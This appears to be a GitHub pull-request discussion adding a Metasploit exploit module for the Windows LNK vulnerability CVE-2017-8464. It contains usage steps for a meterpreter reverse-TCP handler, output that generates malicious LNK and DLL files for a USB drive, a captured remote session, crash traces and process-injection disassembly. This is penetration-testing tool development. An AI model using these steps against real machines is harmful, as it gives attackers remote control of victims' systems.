New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add exploit module for CVE-2017-8464 LNK Code Execution Vulnerability #8767

Merged
merged 11 commits into from Aug 3, 2017

Conversation

Projects
None yet
9 participants
@ykoster
Contributor

ykoster commented Jul 25, 2017

This module exploits a vulnerability in the handling of Windows Shortcut files (.LNK) that contain a dynamic icon, loaded from a malicious DLL.

This vulnerability is a variant of MS15-020 (CVE-2015-0096). The created LNK file is similar except an additional SpecialFolderDataBlock is included. The folder ID set in this SpecialFolderDataBlock is set to the Control Panel. This is enought to bypass the CPL whitelist. This bypass can be used to trick Windows into loading an arbitrary DLL file.

Verification

To set up the vulnerable environment, install a Windows version without the patch for CVE-2017-8464. To test the bypass, make sure that MS10-046 & MS15-020 are installed.

Start a handler

  • use exploit/multi/handler
  • set PAYLOAD windows/x64/meterpreter/reverse_tcp
  • set LHOST [ip victim connects back to]
  • exploit -j
  • back

Run the exploit

  • use exploit/windows/fileformat/cve_2017_8464_lnk_rce
  • set PAYLOAD windows/x64/meterpreter/reverse_tcp
  • set LHOST [ip victim connects back to]
  • exploit

Copy files to USB drive & open on vulnerable system

  • cp /root/.msf4/local/* [USB drive path]
  • Insert device in target machine and browse to it

Sample run:

msf > use exploit/multi/handler 
msf exploit(handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.146.197
LHOST => 192.168.146.197
msf exploit(handler) > exploit -j
[*] Exploit running as background job.

[*] Started reverse TCP handler on 192.168.146.197:4444 
[*] Starting the payload handler...
msf exploit(handler) > back
msf > use exploit/windows/fileformat/cve_2017_8464_lnk_rce 
msf exploit(cve_2017_8464_lnk_rce) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf exploit(cve_2017_8464_lnk_rce) > set LHOST 192.168.146.197
LHOST => 192.168.146.197
msf exploit(cve_2017_8464_lnk_rce) > exploit

msf exploit(cve_2017_8464_lnk_rce) > exploit

[*] /root/.msf4/local/kNgYlztVprHPOmHY.dll created, copy it to the root folder of the target USB drive
[*] /root/.msf4/local/SoXXZhgCWEDkbDyA_D.lnk created, copy to the target USB drive
[*] /root/.msf4/local/rfuSAlSFEPmrgsBh_E.lnk created, copy to the target USB drive
[*] /root/.msf4/local/LydLhRBovVRINgUh_F.lnk created, copy to the target USB drive
[*] /root/.msf4/local/xbpnlkcQOYonGpKW_G.lnk created, copy to the target USB drive
[*] /root/.msf4/local/SezkrIUwqIVvMiOZ_H.lnk created, copy to the target USB drive
[*] /root/.msf4/local/UzsJRIdcpoZPpLEj_I.lnk created, copy to the target USB drive
[*] /root/.msf4/local/BxTkakFYhUaxSNyi_J.lnk created, copy to the target USB drive
[*] /root/.msf4/local/dPdanTusElQRKzGZ_K.lnk created, copy to the target USB drive
[*] /root/.msf4/local/cKUaDslpjLshMEpP_L.lnk created, copy to the target USB drive
[*] /root/.msf4/local/RQPOxJeuGqVCQGNB_M.lnk created, copy to the target USB drive
[*] /root/.msf4/local/tLDnpaeIeUavIxqP_N.lnk created, copy to the target USB drive
[*] /root/.msf4/local/VVQOvhpqJYbhINIX_O.lnk created, copy to the target USB drive
[*] /root/.msf4/local/dAIEBrbaixsXjnnm_P.lnk created, copy to the target USB drive
[*] /root/.msf4/local/AoHnIQhKkpnYSOZR_Q.lnk created, copy to the target USB drive
[*] /root/.msf4/local/kZCCppTXKsuGRSCB_R.lnk created, copy to the target USB drive
[*] /root/.msf4/local/vMBPqzoOEoJXhZqQ_S.lnk created, copy to the target USB drive
[*] /root/.msf4/local/ueCsaNzVsljfHKnS_T.lnk created, copy to the target USB drive
[*] /root/.msf4/local/TSCgPoYrFFnZqMsl_U.lnk created, copy to the target USB drive
[*] /root/.msf4/local/QFbXkQeBmCvXezNg_V.lnk created, copy to the target USB drive
[*] /root/.msf4/local/liPaOopqYJbBIrVY_W.lnk created, copy to the target USB drive
[*] /root/.msf4/local/eZiWpyEYbkWHqStW_X.lnk created, copy to the target USB drive
[*] /root/.msf4/local/PawzVPKmvBoSblhA_Y.lnk created, copy to the target USB drive
[*] /root/.msf4/local/vJhDzJUydwYxnLlp_Z.lnk created, copy to the target USB drive
msf exploit(cve_2017_8464_lnk_rce) > 
[*] Sending stage (1189423 bytes) to 192.168.146.193
[*] Meterpreter session 1 opened (192.168.146.197:4444 -> 192.168.146.193:50020) at 2017-07-25 19:28:27 +0200
sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : DESKTOP-5G8HK7E
OS              : Windows 10 (Build 14393).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > 

@ykoster ykoster changed the title from Add exploit module for CVE-2017-8464 LNK Remote Code Execution Vulnerability to Add exploit module for CVE-2017-8464 LNK Code Execution Vulnerability Jul 25, 2017

Show outdated Hide outdated modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb
# HACK the vulnerability doesn't appear to work with UNC paths
# Create LNK files to different drives instead
'DEFGHIJKLMNOPQRSTUVWXYZ'.split("").each do |i|

This comment has been minimized.

@nixawk

nixawk Jul 25, 2017

Contributor
irb(main):001:0> ('D'..'Z').each {|v| print "#{v} "}
D E F G H I J K L M N O P Q R S T U V W X Y Z => "D".."Z"

A default drive option can be supported.

@nixawk

nixawk Jul 25, 2017

Contributor
irb(main):001:0> ('D'..'Z').each {|v| print "#{v} "}
D E F G H I J K L M N O P Q R S T U V W X Y Z => "D".."Z"

A default drive option can be supported.

Show outdated Hide outdated modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb
['CVE', '2017-8464'],
['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8464'],
['URL', 'http://paper.seebug.org/357/'], # writeup
['URL', 'http://www.vxjump.net/files/vuln_analysis/cve-2017-8464.txt'] # writeup

This comment has been minimized.

@nixawk

nixawk Jul 26, 2017

Contributor

Please add following reference links:

@nixawk

nixawk Jul 26, 2017

Contributor

Please add following reference links:

Show outdated Hide outdated modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb
# IDList
idlist_data = ''
idlist_data << [0x12 + 2].pack('v') # ItemIDSize

This comment has been minimized.

@nixawk

nixawk Jul 26, 2017

Contributor

It's better to comment the number 2 in [0x12 + 2].

ItemID = ItemIDSize (2 bytes) + Data (variable)
@nixawk

nixawk Jul 26, 2017

Contributor

It's better to comment the number 2 in [0x12 + 2].

ItemID = ItemIDSize (2 bytes) + Data (variable)
@wwebb-r7

This comment has been minimized.

Show comment
Hide comment
@wwebb-r7

wwebb-r7 Jul 26, 2017

Contributor

Just a heads-up, the bindata gem is now in framework. You may want to consider using it in the future (if there's something peculiar about LNK files that doesn't translate well in this instance, forget I said anything).

I myself am not going to request that you change it this time around as I don't believe we've codified it as a requirement yet, but it does make dealing with things like this in Ruby much less frustrating

Contributor

wwebb-r7 commented Jul 26, 2017

Just a heads-up, the bindata gem is now in framework. You may want to consider using it in the future (if there's something peculiar about LNK files that doesn't translate well in this instance, forget I said anything).

I myself am not going to request that you change it this time around as I don't believe we've codified it as a requirement yet, but it does make dealing with things like this in Ruby much less frustrating

@nixawk

This comment has been minimized.

Show comment
Hide comment
@nixawk

nixawk Jul 26, 2017

Contributor

I'v tested it against my lab. Explorer crashes.

OS Name:                   Microsoft Windows 7 Ultimate
OS Version:                6.1.7601 Service Pack 1 Build 7601
System Type:               X86-based PC
Contributor

nixawk commented Jul 26, 2017

I'v tested it against my lab. Explorer crashes.

OS Name:                   Microsoft Windows 7 Ultimate
OS Version:                6.1.7601 Service Pack 1 Build 7601
System Type:               X86-based PC
@nixawk

This comment has been minimized.

Show comment
Hide comment
@nixawk

nixawk Jul 26, 2017

Contributor

@ykoster Good job. The pr needs more test. It crashes my explorer.exe.

Problem signature:
  Problem Event Name:	APPCRASH
  Application Name:	explorer.exe
  Application Version:	6.1.7601.23537
  Application Timestamp:	57c44cc4
  Fault Module Name:	ntdll.dll
  Fault Module Version:	6.1.7601.23714
  Fault Module Timestamp:	58bf8774
  Exception Code:	c0000005
  Exception Offset:	0002ad83
  OS Version:	6.1.7601.2.1.0.256.1
  Locale ID:	1033
  Additional Information 1:	a7aa
  Additional Information 2:	a7aa91f17ea749d42a4de3b390fa5b3d
  Additional Information 3:	a7aa
  Additional Information 4:	a7aa91f17ea749d42a4de3b390fa5b3d

Read our privacy statement online:
  http://go.microsoft.com/fwlink/?linkid=104288&clcid=0x0409

If the online privacy statement is not available, please read our privacy statement offline:
  C:\Windows\system32\en-US\erofflps.txt

(834.330): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=11c70001 ecx=000011c7 edx=00000000 esi=759c55bd edi=00000000
eip=76f7ad83 esp=04d4c408 ebp=04d4c45c iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
ntdll!RtlDeactivateActivationContext+0x6f:
76f7ad83 334814          xor     ecx,dword ptr [eax+14h] ds:0023:00000014=????????
0:018> kv
ChildEBP RetAddr  Args to Child              
04d4c45c 759c5662 00000000 11c70001 04d4c6cc ntdll!RtlDeactivateActivationContext+0x6f (FPO: [Non-Fpo])
04d4c46c 763d7062 00000000 11c70001 759cd835 kernel32!DeactivateActCtx+0x31 (FPO: [Non-Fpo])
04d4c6cc 765f3ddf 04d4c704 00000000 04d4ce78 SHELL32!CPL_LoadCPLModule+0x18f (FPO: [Non-Fpo])
04d4cd70 765f3f26 03ec9540 04d4ce78 763a01b0 SHELL32!CControlPanelFolder::_GetPidlFromAppletId+0x19c (FPO: [Non-Fpo])
04d4cd9c 763879d3 057f2d08 00000000 03e805a0 SHELL32!CControlPanelFolder::ParseDisplayName+0x49 (FPO: [Non-Fpo])
04d4ce20 7638f0df 03f6d67c 00000000 03e805a0 SHELL32!CRegFolder::ParseDisplayName+0x93 (FPO: [Non-Fpo])
04d4ce94 763906fd 03ec200c 057f2aa0 763aa690 SHELL32!ReparseRelativeIDList+0x137 (FPO: [Non-Fpo])
04d4ced8 76390745 00000000 057f2a78 057fb9b8 SHELL32!TranslateAliasWithEvent+0xa6 (FPO: [Non-Fpo])
04d4cef0 7635e88e 057f2a78 057fb9b8 05808528 SHELL32!TranslateAlias+0x15 (FPO: [Non-Fpo])
04d4cf1c 7635e623 00000000 00000000 03de78f0 SHELL32!CShellLink::_DecodeSpecialFolder+0xf9 (FPO: [Non-Fpo])
04d4e1e0 7631ca08 058043b8 00000000 00000000 SHELL32!CShellLink::_LoadFromStream+0x39f (FPO: [Non-Fpo])
04d4e410 7631c977 04d4e49c 00000000 04d4e44c SHELL32!CShellLink::_LoadFromFile+0x90 (FPO: [Non-Fpo])
04d4e420 7631c8cc 03de7904 04d4e49c 00000000 SHELL32!CShellLink::Load+0x32 (FPO: [Non-Fpo])
04d4e44c 7631c923 03de78f8 04d4e49c 00000000 SHELL32!InitializeFileHandlerWithFile+0x6a (FPO: [Non-Fpo])
04d4e6a8 76368c20 00000000 04d4e6fc 00000002 SHELL32!CFileSysItemString::HandlerCreateInstance+0x168 (FPO: [Non-Fpo])
04d4e760 76372666 00000000 00000000 00000000 SHELL32!CFileSysItemString::LoadHandler+0x16b (FPO: [Non-Fpo])
04d4ec10 763726b4 00000000 00000001 04d4ec58 SHELL32!CFSFolder::_BindHandler+0x1d1 (FPO: [Non-Fpo])
04d4ec30 76626ae6 03ee5480 00000000 00000001 SHELL32!CFSFolder::GetUIObjectOf+0x21 (FPO: [Non-Fpo])
04d4ec6c 764e97fb 03ee5480 03ee1e18 04d4ecb4 SHELL32!CFolderThumbnail::_UseShortcut+0x3b (FPO: [Non-Fpo])
04d4ec84 76434010 03ee5480 03ee1e18 00000000 SHELL32!CFolderThumbnail::_UseItem+0x2d (FPO: [Non-Fpo])
04d4eec0 76433f4b 03ee5480 03ee1e18 00000002 SHELL32!CFolderThumbnail::_AddItemToExtractionArray+0xec (FPO: [Non-Fpo])
04d4ef24 76433e78 03ee5480 00000002 04d4ef8c SHELL32!CFolderThumbnail::_GetItemsToExtractByEnumerating+0x121 (FPO: [Non-Fpo])
04d4ef64 76432c32 00000002 04d4ef8c 057f31e0 SHELL32!CFolderThumbnail::_GetItemsToExtract+0x107 (FPO: [Non-Fpo])
04d4ef94 76432bc6 00000002 04d4f20c 057f3208 SHELL32!CFolderThumbnail::_GetThumbnailsFromEnumeration+0x56 (FPO: [Non-Fpo])
04d4f1c0 76433261 00000002 04d4f20c 04d4f294 SHELL32!CFolderThumbnail::_GetThumbnails+0xe3 (FPO: [Non-Fpo])
04d4f220 73dcac34 057f3208 04d4f254 80000000 SHELL32!CFolderThumbnail::Extract+0x61 (FPO: [Non-Fpo])
04d4f25c 73dc8015 00000100 04d4f314 04d4f294 thumbcache!RunExtractor+0xa3
04d4f29c 73dc81a0 03eb6c1c 00000100 00000100 thumbcache!CThumbnailCache::_PerformFullExtraction+0xda
04d4f31c 73dc2969 04d4f370 00000100 00000000 thumbcache!CThumbnailCache::_GetThumbnailImpl+0x2a4
04d4f394 764309c7 03eb2e80 03eb6c1c 00000100 thumbcache!CThumbnailCache::GetThumbnail+0x1c9
04d4f3d4 764300b1 00000100 00000100 00000009 SHELL32!CShellItem::_GetThumbnail+0x97 (FPO: [Non-Fpo])
04d4f434 76434b08 03eb6c20 00000100 00000100 SHELL32!CShellItem::GetSharedBitmap+0xb7 (FPO: [Non-Fpo])
04d4f474 764357ff 00000100 0581bc78 057faad0 SHELL32!CImagePrefetchWorkItem::_LoadThumbnail+0x74 (FPO: [Non-Fpo])
04d4f4a8 76435731 00000001 00000100 05808468 SHELL32!CImagePrefetchWorkItem::_PrefetchThumbnail+0xbe (FPO: [Non-Fpo])
04d4f4d4 76473808 00000001 0581bc78 00000004 SHELL32!CImagePrefetchWorkItem::_PrefetchImages+0x4a (FPO: [Non-Fpo])
04d4f51c 7647017d 03edfb18 762381eb 03f02458 SHELL32!CImagePrefetchWorkItem::DoWork+0xfa (FPO: [Non-Fpo])
04d4f534 76368266 03f02458 01000000 80000000 SHELL32!CFrameTask::InternalResumeRT+0x14 (FPO: [Non-Fpo])
04d4f554 763a622b 03f0246c 7fffffff 03da6188 SHELL32!CRunnableTask::Run+0xce (FPO: [Non-Fpo])
04d4f570 763a8abb 04d4f5ac 00000000 03e0a578 SHELL32!CShellTask::TT_Run+0x167 (FPO: [Non-Fpo])
04d4f5b8 763a8bef 04d4f5d0 7563b2b1 03da6188 SHELL32!CShellTaskThread::ThreadProc+0xa3 (FPO: [Non-Fpo])
04d4f5c0 7563b2b1 03da6188 03dcdc08 04d4f644 SHELL32!CShellTaskThread::s_ThreadProc+0x1b (FPO: [Non-Fpo])
04d4f5d0 76f7d7c4 03e0a578 73851035 03dcdc08 SHLWAPI!ExecuteWorkItemThreadProc+0xe (FPO: [Non-Fpo])
04d4f644 76f80774 03e0a578 03dcdc08 738511e5 ntdll!RtlpTpWorkCallback+0x11d (FPO: [Non-Fpo])
04d4f794 759cef8c 002a00e0 04d4f7e0 76fb367a ntdll!TppWorkerThread+0x562 (FPO: [Non-Fpo])
04d4f7a0 76fb367a 002a00e0 73851191 00000000 kernel32!BaseThreadInitThunk+0xe (FPO: [Non-Fpo])
04d4f7e0 76fb364d 76f802cb 002a00e0 00000000 ntdll!__RtlUserThreadStart+0x70 (FPO: [Non-Fpo])
04d4f7f8 00000000 76f802cb 002a00e0 00000000 ntdll!_RtlUserThreadStart+0x1b (FPO: [Non-Fpo])

Msf client receives a meterpreter session .

Contributor

nixawk commented Jul 26, 2017

@ykoster Good job. The pr needs more test. It crashes my explorer.exe.

Problem signature:
  Problem Event Name:	APPCRASH
  Application Name:	explorer.exe
  Application Version:	6.1.7601.23537
  Application Timestamp:	57c44cc4
  Fault Module Name:	ntdll.dll
  Fault Module Version:	6.1.7601.23714
  Fault Module Timestamp:	58bf8774
  Exception Code:	c0000005
  Exception Offset:	0002ad83
  OS Version:	6.1.7601.2.1.0.256.1
  Locale ID:	1033
  Additional Information 1:	a7aa
  Additional Information 2:	a7aa91f17ea749d42a4de3b390fa5b3d
  Additional Information 3:	a7aa
  Additional Information 4:	a7aa91f17ea749d42a4de3b390fa5b3d

Read our privacy statement online:
  http://go.microsoft.com/fwlink/?linkid=104288&clcid=0x0409

If the online privacy statement is not available, please read our privacy statement offline:
  C:\Windows\system32\en-US\erofflps.txt

(834.330): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=11c70001 ecx=000011c7 edx=00000000 esi=759c55bd edi=00000000
eip=76f7ad83 esp=04d4c408 ebp=04d4c45c iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
ntdll!RtlDeactivateActivationContext+0x6f:
76f7ad83 334814          xor     ecx,dword ptr [eax+14h] ds:0023:00000014=????????
0:018> kv
ChildEBP RetAddr  Args to Child              
04d4c45c 759c5662 00000000 11c70001 04d4c6cc ntdll!RtlDeactivateActivationContext+0x6f (FPO: [Non-Fpo])
04d4c46c 763d7062 00000000 11c70001 759cd835 kernel32!DeactivateActCtx+0x31 (FPO: [Non-Fpo])
04d4c6cc 765f3ddf 04d4c704 00000000 04d4ce78 SHELL32!CPL_LoadCPLModule+0x18f (FPO: [Non-Fpo])
04d4cd70 765f3f26 03ec9540 04d4ce78 763a01b0 SHELL32!CControlPanelFolder::_GetPidlFromAppletId+0x19c (FPO: [Non-Fpo])
04d4cd9c 763879d3 057f2d08 00000000 03e805a0 SHELL32!CControlPanelFolder::ParseDisplayName+0x49 (FPO: [Non-Fpo])
04d4ce20 7638f0df 03f6d67c 00000000 03e805a0 SHELL32!CRegFolder::ParseDisplayName+0x93 (FPO: [Non-Fpo])
04d4ce94 763906fd 03ec200c 057f2aa0 763aa690 SHELL32!ReparseRelativeIDList+0x137 (FPO: [Non-Fpo])
04d4ced8 76390745 00000000 057f2a78 057fb9b8 SHELL32!TranslateAliasWithEvent+0xa6 (FPO: [Non-Fpo])
04d4cef0 7635e88e 057f2a78 057fb9b8 05808528 SHELL32!TranslateAlias+0x15 (FPO: [Non-Fpo])
04d4cf1c 7635e623 00000000 00000000 03de78f0 SHELL32!CShellLink::_DecodeSpecialFolder+0xf9 (FPO: [Non-Fpo])
04d4e1e0 7631ca08 058043b8 00000000 00000000 SHELL32!CShellLink::_LoadFromStream+0x39f (FPO: [Non-Fpo])
04d4e410 7631c977 04d4e49c 00000000 04d4e44c SHELL32!CShellLink::_LoadFromFile+0x90 (FPO: [Non-Fpo])
04d4e420 7631c8cc 03de7904 04d4e49c 00000000 SHELL32!CShellLink::Load+0x32 (FPO: [Non-Fpo])
04d4e44c 7631c923 03de78f8 04d4e49c 00000000 SHELL32!InitializeFileHandlerWithFile+0x6a (FPO: [Non-Fpo])
04d4e6a8 76368c20 00000000 04d4e6fc 00000002 SHELL32!CFileSysItemString::HandlerCreateInstance+0x168 (FPO: [Non-Fpo])
04d4e760 76372666 00000000 00000000 00000000 SHELL32!CFileSysItemString::LoadHandler+0x16b (FPO: [Non-Fpo])
04d4ec10 763726b4 00000000 00000001 04d4ec58 SHELL32!CFSFolder::_BindHandler+0x1d1 (FPO: [Non-Fpo])
04d4ec30 76626ae6 03ee5480 00000000 00000001 SHELL32!CFSFolder::GetUIObjectOf+0x21 (FPO: [Non-Fpo])
04d4ec6c 764e97fb 03ee5480 03ee1e18 04d4ecb4 SHELL32!CFolderThumbnail::_UseShortcut+0x3b (FPO: [Non-Fpo])
04d4ec84 76434010 03ee5480 03ee1e18 00000000 SHELL32!CFolderThumbnail::_UseItem+0x2d (FPO: [Non-Fpo])
04d4eec0 76433f4b 03ee5480 03ee1e18 00000002 SHELL32!CFolderThumbnail::_AddItemToExtractionArray+0xec (FPO: [Non-Fpo])
04d4ef24 76433e78 03ee5480 00000002 04d4ef8c SHELL32!CFolderThumbnail::_GetItemsToExtractByEnumerating+0x121 (FPO: [Non-Fpo])
04d4ef64 76432c32 00000002 04d4ef8c 057f31e0 SHELL32!CFolderThumbnail::_GetItemsToExtract+0x107 (FPO: [Non-Fpo])
04d4ef94 76432bc6 00000002 04d4f20c 057f3208 SHELL32!CFolderThumbnail::_GetThumbnailsFromEnumeration+0x56 (FPO: [Non-Fpo])
04d4f1c0 76433261 00000002 04d4f20c 04d4f294 SHELL32!CFolderThumbnail::_GetThumbnails+0xe3 (FPO: [Non-Fpo])
04d4f220 73dcac34 057f3208 04d4f254 80000000 SHELL32!CFolderThumbnail::Extract+0x61 (FPO: [Non-Fpo])
04d4f25c 73dc8015 00000100 04d4f314 04d4f294 thumbcache!RunExtractor+0xa3
04d4f29c 73dc81a0 03eb6c1c 00000100 00000100 thumbcache!CThumbnailCache::_PerformFullExtraction+0xda
04d4f31c 73dc2969 04d4f370 00000100 00000000 thumbcache!CThumbnailCache::_GetThumbnailImpl+0x2a4
04d4f394 764309c7 03eb2e80 03eb6c1c 00000100 thumbcache!CThumbnailCache::GetThumbnail+0x1c9
04d4f3d4 764300b1 00000100 00000100 00000009 SHELL32!CShellItem::_GetThumbnail+0x97 (FPO: [Non-Fpo])
04d4f434 76434b08 03eb6c20 00000100 00000100 SHELL32!CShellItem::GetSharedBitmap+0xb7 (FPO: [Non-Fpo])
04d4f474 764357ff 00000100 0581bc78 057faad0 SHELL32!CImagePrefetchWorkItem::_LoadThumbnail+0x74 (FPO: [Non-Fpo])
04d4f4a8 76435731 00000001 00000100 05808468 SHELL32!CImagePrefetchWorkItem::_PrefetchThumbnail+0xbe (FPO: [Non-Fpo])
04d4f4d4 76473808 00000001 0581bc78 00000004 SHELL32!CImagePrefetchWorkItem::_PrefetchImages+0x4a (FPO: [Non-Fpo])
04d4f51c 7647017d 03edfb18 762381eb 03f02458 SHELL32!CImagePrefetchWorkItem::DoWork+0xfa (FPO: [Non-Fpo])
04d4f534 76368266 03f02458 01000000 80000000 SHELL32!CFrameTask::InternalResumeRT+0x14 (FPO: [Non-Fpo])
04d4f554 763a622b 03f0246c 7fffffff 03da6188 SHELL32!CRunnableTask::Run+0xce (FPO: [Non-Fpo])
04d4f570 763a8abb 04d4f5ac 00000000 03e0a578 SHELL32!CShellTask::TT_Run+0x167 (FPO: [Non-Fpo])
04d4f5b8 763a8bef 04d4f5d0 7563b2b1 03da6188 SHELL32!CShellTaskThread::ThreadProc+0xa3 (FPO: [Non-Fpo])
04d4f5c0 7563b2b1 03da6188 03dcdc08 04d4f644 SHELL32!CShellTaskThread::s_ThreadProc+0x1b (FPO: [Non-Fpo])
04d4f5d0 76f7d7c4 03e0a578 73851035 03dcdc08 SHLWAPI!ExecuteWorkItemThreadProc+0xe (FPO: [Non-Fpo])
04d4f644 76f80774 03e0a578 03dcdc08 738511e5 ntdll!RtlpTpWorkCallback+0x11d (FPO: [Non-Fpo])
04d4f794 759cef8c 002a00e0 04d4f7e0 76fb367a ntdll!TppWorkerThread+0x562 (FPO: [Non-Fpo])
04d4f7a0 76fb367a 002a00e0 73851191 00000000 kernel32!BaseThreadInitThunk+0xe (FPO: [Non-Fpo])
04d4f7e0 76fb364d 76f802cb 002a00e0 00000000 ntdll!__RtlUserThreadStart+0x70 (FPO: [Non-Fpo])
04d4f7f8 00000000 76f802cb 002a00e0 00000000 ntdll!_RtlUserThreadStart+0x1b (FPO: [Non-Fpo])

Msf client receives a meterpreter session .

@ykoster

This comment has been minimized.

Show comment
Hide comment
@ykoster

ykoster Jul 26, 2017

Contributor

@nixawk will test on more VMs/OSes

Contributor

ykoster commented Jul 26, 2017

@nixawk will test on more VMs/OSes

Show outdated Hide outdated documentation/modules/exploit/windows/fileformat/cve_2017_8464_lnk_rce.md
[*] Started reverse TCP handler on 192.168.146.197:4444
[*] Starting the payload handler...
msf exploit(handler) > back
msf > use exploit/windows/smb/cve_2017_8464_lnk_rce

This comment has been minimized.

@nixawk

nixawk Jul 26, 2017

Contributor
use exploits/windows/fileformat/cve_2017_8464_lnk_rce
@nixawk

nixawk Jul 26, 2017

Contributor
use exploits/windows/fileformat/cve_2017_8464_lnk_rce
@ykoster

This comment has been minimized.

Show comment
Hide comment
@ykoster

ykoster Jul 26, 2017

Contributor

@nixawk so if I understand correctly. Explorer crashes, but you have a Meterpreter session?

That is the same on my machine. Essentially it uses the same method as ms15_020_shortcut_icon_dllloader.rb. I tried different EXITFUNC settings, but can't prevent Explorer from crashing. Haven't really looked into it, but may be related to the fact that CPlApplet() is not exported.

Contributor

ykoster commented Jul 26, 2017

@nixawk so if I understand correctly. Explorer crashes, but you have a Meterpreter session?

That is the same on my machine. Essentially it uses the same method as ms15_020_shortcut_icon_dllloader.rb. I tried different EXITFUNC settings, but can't prevent Explorer from crashing. Haven't really looked into it, but may be related to the fact that CPlApplet() is not exported.

@nixawk

This comment has been minimized.

Show comment
Hide comment
@nixawk

nixawk Jul 26, 2017

Contributor

@ykoster

  • Windows XP SP3 English: everything goes well, no exception.
  • Windows 7 English X86: explorer.exe crashes, but msf gains a meterpreter session.

I've tried to use EXITFUNC (seh, process, thread), but failed to make it stable. Exception Stack as follow:

Call stack of thread 000008C8
Address    Returns to    Procedure / arguments                 Called from                   Frame      Stack Dump
0223C3F0   77A2F545      ntdll.TpCheckTerminateWorker          ntdll.77A2F540                0223C3EC
0223C404   74041127      ? ntdll.RtlExitUserThread             test.74041121                 0223C400
0223C408   00000000        ExitCode = 0
0223C734   74041147      test.74041050                         test.74041142                 0223C730   00000001 0223C75
0223C740   77A58854      Includes test.74041147                ntdll.77A58851                0223C73C   74040000 0000000
0223C760   77A65B3F      ? ntdll.77A58840                      ntdll.77A65B3A                0223C75C   74041130 7404000
0223C764   74041130      *** CORRUPT ENTRY ***                                               0223C850

74041050   55               PUSH EBP
74041051   8BEC             MOV EBP,ESP
74041053   81EC 24030000    SUB ESP,324
74041059   6A 44            PUSH 44
7404105B   8D45 A8          LEA EAX,DWORD PTR SS:[EBP-58]
7404105E   50               PUSH EAX
7404105F   E8 9CFFFFFF      CALL test.74041000
74041064   83C4 08          ADD ESP,8
74041067   C745 A8 44000000 MOV DWORD PTR SS:[EBP-58],44
7404106E   8D4D EC          LEA ECX,DWORD PTR SS:[EBP-14]
74041071   51               PUSH ECX
74041072   8D55 A8          LEA EDX,DWORD PTR SS:[EBP-58]
74041075   52               PUSH EDX
74041076   6A 00            PUSH 0
74041078   6A 00            PUSH 0
7404107A   6A 44            PUSH 44
7404107C   6A 00            PUSH 0
7404107E   6A 00            PUSH 0
74041080   6A 00            PUSH 0
74041082   68 00380474      PUSH test.74043800                       ; ASCII "rundll32.exe"
74041087   6A 00            PUSH 0
74041089   FF15 0C200474    CALL DWORD PTR DS:[<&KERNEL32.CreateProc>; kernel32.CreateProcessA
7404108F   85C0             TEST EAX,EAX
74041091   0F84 88000000    JE test.7404111F
74041097   C785 DCFCFFFF 03>MOV DWORD PTR SS:[EBP-324],10003
740410A1   8D85 DCFCFFFF    LEA EAX,DWORD PTR SS:[EBP-324]
740410A7   50               PUSH EAX
740410A8   8B4D F0          MOV ECX,DWORD PTR SS:[EBP-10]
740410AB   51               PUSH ECX
740410AC   FF15 10200474    CALL DWORD PTR DS:[<&KERNEL32.GetThreadC>; kernel32.GetThreadContext
740410B2   6A 40            PUSH 40
740410B4   68 00100000      PUSH 1000
740410B9   68 00080000      PUSH 800
740410BE   6A 00            PUSH 0
740410C0   8B55 EC          MOV EDX,DWORD PTR SS:[EBP-14]
740410C3   52               PUSH EDX
740410C4   FF15 18200474    CALL DWORD PTR DS:[<&KERNEL32.VirtualAll>; kernel32.VirtualAllocEx
740410CA   8945 FC          MOV DWORD PTR SS:[EBP-4],EAX
740410CD   6A 00            PUSH 0
740410CF   68 00080000      PUSH 800
740410D4   68 00300474      PUSH test.74043000
740410D9   8B45 FC          MOV EAX,DWORD PTR SS:[EBP-4]
740410DC   50               PUSH EAX
740410DD   8B4D EC          MOV ECX,DWORD PTR SS:[EBP-14]
740410E0   51               PUSH ECX
740410E1   FF15 1C200474    CALL DWORD PTR DS:[<&KERNEL32.WriteProce>; kernel32.WriteProcessMemory
740410E7   8B55 FC          MOV EDX,DWORD PTR SS:[EBP-4]
740410EA   8995 94FDFFFF    MOV DWORD PTR SS:[EBP-26C],EDX
740410F0   8D85 DCFCFFFF    LEA EAX,DWORD PTR SS:[EBP-324]
740410F6   50               PUSH EAX
740410F7   8B4D F0          MOV ECX,DWORD PTR SS:[EBP-10]
740410FA   51               PUSH ECX
740410FB   FF15 14200474    CALL DWORD PTR DS:[<&KERNEL32.SetThreadC>; kernel32.SetThreadContext
74041101   8B55 F0          MOV EDX,DWORD PTR SS:[EBP-10]
74041104   52               PUSH EDX
74041105   FF15 08200474    CALL DWORD PTR DS:[<&KERNEL32.ResumeThre>; kernel32.ResumeThread
7404110B   8B45 F0          MOV EAX,DWORD PTR SS:[EBP-10]
7404110E   50               PUSH EAX
7404110F   FF15 00200474    CALL DWORD PTR DS:[<&KERNEL32.CloseHandl>; kernel32.CloseHandle
74041115   8B4D EC          MOV ECX,DWORD PTR SS:[EBP-14]
74041118   51               PUSH ECX
74041119   FF15 00200474    CALL DWORD PTR DS:[<&KERNEL32.CloseHandl>; kernel32.CloseHandle
7404111F   6A 00            PUSH 0
74041121   FF15 04200474    CALL DWORD PTR DS:[<&KERNEL32.ExitThread>; ntdll.RtlExitUserThread
74041127   8BE5             MOV ESP,EBP
74041129   5D               POP EBP
7404112A   C3               RETN

screen shot 2017-07-26 at 23 50 50

Contributor

nixawk commented Jul 26, 2017

@ykoster

